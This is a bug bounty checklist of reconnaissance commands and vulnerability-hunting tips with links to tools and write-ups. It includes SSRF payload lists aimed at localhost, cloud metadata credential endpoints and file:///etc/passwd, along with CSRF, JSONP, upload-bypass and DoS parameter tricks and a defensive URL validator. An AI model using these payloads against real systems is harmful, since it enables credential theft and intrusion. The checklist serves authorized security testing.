BUG BOUNTY CHECK LIST BY C1

RECON

Subdomain

crt.sh | %.yahoo.com

Free CT Log Certificate Search Tool from Sectigo (formerly Comodo CA)

crt.sh | %api%%.yahoo.com

curl "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=$1" | jq .subdomains | grep -o "\w.*$1"
curl "https://api.hackertarget.com/hostsearch/?q=$1" | grep -o "\w.*$1"
curl "https://crt.sh/?q=%.$1" | grep "$1" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -u
curl "https://certspotter.com/api/v0/certs?domain=$1" | grep -o '\[".*"\]'

tomnomnom/httprobe

Take a list of domains and probe for working http and https servers. ▶ go get -u github.com/tomnomnom/httprobe httprobe…

aboul3la/Sublist3r

Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and…

gwen001/github-search

GitHub tools collection

This is the current thread in the bug hunter community: how to find sensitive informations on GitHub. Understand how to…

IP

Port

robertdavidgraham/masscan

This is an Internet-scale port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million…

Nmap: the Network Mapper — Free Security Scanner

Nmap 7.80 was released for DEFCON 27! [release notes | download] Nmap 7.70 is now available! [release notes | download]…

nmap -sV -T3 -Pn -p2075,2076,6443,3868,3366,8443,8080,9443,9091,3000,8000,5900,8081,6000,10000,8181,3306,5000,4000,8888,5432,15672,9999,161,4044,7077,4040,9000,8089,443,7447,7080,8880,8983,5673,7443,19000,19080 ${target}

Endpoint

curl "http://web.archive.org/cdx/search/cdx?url=*.$1/*&output=text&fl=original&collapse=urlkey"
curl "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$1&output=json" | jq .url

Threezh1/JSFinder

JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website.

maurosoria/dirsearch

Current Release: v0.3.9 (2019.11.26) dirsearch is a simple command line tool designed to brute force directories and…

C1h2e1/MyFuzzingDict

HUNTING

  • SSRF
  • CSRF (CORS, JSONP hijacking)
  • SQLi
  • XSS (DOM, Stored, Reflected)
  • Weak Password
  • Unauthorized access
  • IDOR
  • Open redirect
  • Information Disclosure
  • XXE
  • File Upload
  • Subdomain Takeover
  • BLH
  • HTTP Request Smuggling
  • CRLF
  • Auth Bypass
  • DoS
  • LFI
  • Command injection
  • Race Condition
  • S3 Bucket
  • Logic Flaw
  • SSTI

SSRF

Open redirect/SSRF payload generator

white@black.com ==> black[.]com
black[.]com?white[.]com ==> black[.]com
black[.]com#white.com ==> black[.]com
Tips by @____cypher____
http://127.0.0.1
http://localhost
https://127.0.0.1/
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
https://localhost/
http://[::]:80/
http://127.0.0.1.nip.io
http://[0:0:0:0:0:ffff:127.0.0.1]
http://spoofed.burpcollaborator.net
http://0177.0.0.1/
http://2130706433/
http://0/
https://10.0.0.1.xip.io
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3
<?php
header("Location: http://127.0.0.1");
?>
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
File protocol to read local file
file:///etc/passwd
http://100.100.100.200/latest/meta-data/
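A defender-side check for the URL forms in the list above, written here as an added example (not code from the original post or from any of the linked projects): it refuses non-http(s) schemes, any userinfo, and any numeric host that is not a plain dotted quad, then checks literal or resolved addresses against loopback, link-local (169.254.169.254), RFC 1918, 100.64/10 (100.100.100.200) and IPv4-mapped IPv6. Function and constant names are my own; 203.0.113.10 is a constructed documentation-range address.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach: loopback, link-local (the
# 169.254.169.254 metadata endpoint), RFC 1918, 100.64/10 (100.100.100.200),
# plus the unspecified and private IPv6 equivalents.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10")]
# Only a plain dotted quad without leading zeros counts as an IPv4 literal;
# decimal (2130706433), octal (0177.0.0.1), hex and "0" are refused outright.
STRICT_IPV4 = re.compile(r"(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}"
                         r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)")
NUMERIC_LOOKING = re.compile(r"[0-9.]+|0x[0-9a-fA-Fx.]+")

def is_blocked(addr):
    # ::ffff:127.0.0.1 is unwrapped so the IPv4 ranges apply to it too.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETS)

def check_fetch_url(url):
    """Return 'allow' or 'reject: <reason>' for a user-supplied fetch URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "reject: scheme"          # file:///etc/passwd, gopher:// ...
    if parts.username is not None or parts.password is not None:
        return "reject: userinfo"        # 1.1.1.1 &@2.2.2.2# @3.3.3.3 confusion
    host = parts.hostname
    if not host:
        return "reject: no host"
    try:
        if STRICT_IPV4.fullmatch(host) or ":" in host:
            addrs = [ipaddress.ip_address(host)]
        elif NUMERIC_LOOKING.fullmatch(host):
            return "reject: ambiguous numeric host"
        else:
            # Hostnames (localhost, *.nip.io, *.xip.io) are judged by what
            # they resolve to; strip any "%scope" from IPv6 answers.
            addrs = [ipaddress.ip_address(i[4][0].split("%")[0])
                     for i in socket.getaddrinfo(host, None)]
    except (ValueError, socket.gaierror):
        return "reject: unparsable or unresolvable host"
    if any(is_blocked(a) for a in addrs):
        return "reject: internal address"
    return "allow"
```

The resolved address must also be the one the fetcher actually connects to (pin it), otherwise the DNS rebinding write-up linked below still applies.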

swisskyrepo/PayloadsAllTheThings

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on…

My First SSRF Using DNS Rebinding

Imagine you are a computer :D People give you URLs and you load them Of course you won’t load url that points to your…

cujanovic/SSRF-Testing

http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/…

CSRF (CORS, JSONP hijacking)

Delete the CSRF token
Null token parameter
Modify the request method, from GET to POST or PUT, etc.
Replace the token with any string of the same length as the token
Fixed token: the same token works for every user

Think Outside the Scope: Advanced CORS Exploitation Techniques

kapytein/jsonp

jsonp is a Burp Extension which tries to discover JSONP functionality behind JSON endpoints. It does so by appending…

callback=gh0stkey
cb=gh0stkey
jsonp=gh0stkey
jsonpcallback=gh0stkey
jsonpcb=gh0stkey
jsonp_cb=gh0stkey
json=gh0stkey
jsoncallback=gh0stkey
jcb=gh0stkey
call=gh0stkey
cb_=gh0stkey
_cb_=gh0stkey

SQLi

tennc/fuzzdb

XSS (DOM, Stored, Reflected)

XSS in hidden input fields

Gareth Heyes | 16 November 2015 at 11:25 UTC Updated: 14 June 2019 at 12:03 UTC At PortSwigger, we regularly run…

XSS in Oculus Rifts CDN

After looking through Oculus Rifts site I came across the developer section for making apps. I quickly made a test app…

XSS Hunter

C1h2e1/c1h2e1.github.io

Weak Password

Unauthorized access

IDOR

Quitten/Autorize

Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by…

One Way to Find Hidden IDOR Vulnerability

I received an invitation for an internal project, i found an interesting vulnerability in this project. After…

Open redirect

C1h2e1/c1h2e1.github.io

Open Redirect Cheat Sheet

Hi, this is a cheat sheet for Open redirect vulnerabilities. It’s a first draft. I will update it every time I find a…

Replace whitelisted.com with your target

XXE

  1. Upload File

Exploiting XXE with Excel

XML External Entity attacks are very common, particularly through HTTP-based APIs, and we regularly encounter and…

U.S. Dept Of Defense disclosed on HackerOne: XXE in DoD website…

Summary: XXE in https://█████. Description: A malicious user can modify an XML-based request to include XML…

Starbucks disclosed on HackerOne: XXE at…

johnstone discovered that both ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx &…

File Upload

Exploiting File Uploads Pt. 1 — MIME Sniffing to Stored XSS #bugbounty

While bug hunting on a private program I was able to find a Stored XSS vulnerability through a file upload…

Exploiting File Uploads Pt. 2 — A Tale of a $3k worth RCE.

In this post I show how I was able to find a Remote Code Execution vulnerability on a private program through…

  • Add dot after the file name
  • File name with special symbol before or after
  • Delete meta-data
  • Race condition

modzero/mod0BurpUploadScanner

A Burp Suite Pro extension to do security tests for HTTP file uploads. Table of Contents Testing web applications is a…

Subdomain Takeover

Echocipher/Subdomain-Takeover

A subdomain takeover detection tool. author: Echocipher mail: echocipher@163.com blog: https://echocipher.github.io This project is something I…

haccer/subjack

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones…

BLH

Command Injection Through BLH

Hi I am Shankar R ( @trapp3r_hat) from Tirunelveli (India). I hope you all doing good. I am a security researcher from…

Broken Link Hijacking — How expired links can be exploited.

Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link Hijacking comes in…

stevenvachon/broken-link-checker

Find broken links, missing images, etc within your HTML. ✅ Complete: Unicode, redirects, compression, basic auth…

HTTP Request Smuggling

Write up of two HTTP Requests Smuggling

This article is about how I found two sites with HTTP Request Smuggling

CRLF

#BugBounty — Exploiting CRLF Injection can lands into a nice bounty

Auth Bypass

Phabricator disclosed on HackerOne: Bypass auth.email-domains

Email addresses are stored as `VARCHAR(128)`. However, Phabricator does not verify the length of an email address upon…

DoS

QIWI disclosed on HackerOne: apache access.log leakage via long…

Issue: access.log is leaked by an attacker who tries to send many requests. #Explain: Honestly I don't know how the bug is…

https://target.com/Verification/?high=100&weigh=100
https://target.com/Verification/?high=100000&weigh=1000000
response boom!
If there is no parameter controlling the size, we can add one ourselves:
width=250&height=250
height=250
width=250
w=250&h=250
h=250
w=250
size=250&width=250&height=250
size=250&w=250&h=250
size=250
margin=250
margin=250&width=250&height=250
margin=250&w=250&h=250
size=250&margin=250
size=250&margin=250&width=250&height=250

[Writeup — FB] Crash web — app through application form of job application pages

It’s me again, after my first write-up bounty.

LFI

LFI Cheat Sheet

LFI stands for Local File Includes — it’s a file local inclusion vulnerability that allows an attacker to include files…

Race Condition

HackerOne disclosed on HackerOne: Race Condition in Flag Submission

Summary: This report describes a Race Condition Vulnerability which allows an authenticated user to submit the same…

HackerOne disclosed on HackerOne: Race condition in performing…

Summary There exists a race condition in performing retests. By executing multiple requests to confirm a retest at the…

HPP

Testing for HTTP Parameter pollution (OTG-INPVAL-004)

This article is part of the new OWASP Testing Guide v4. Back to the OWASP Testing Guide v4…
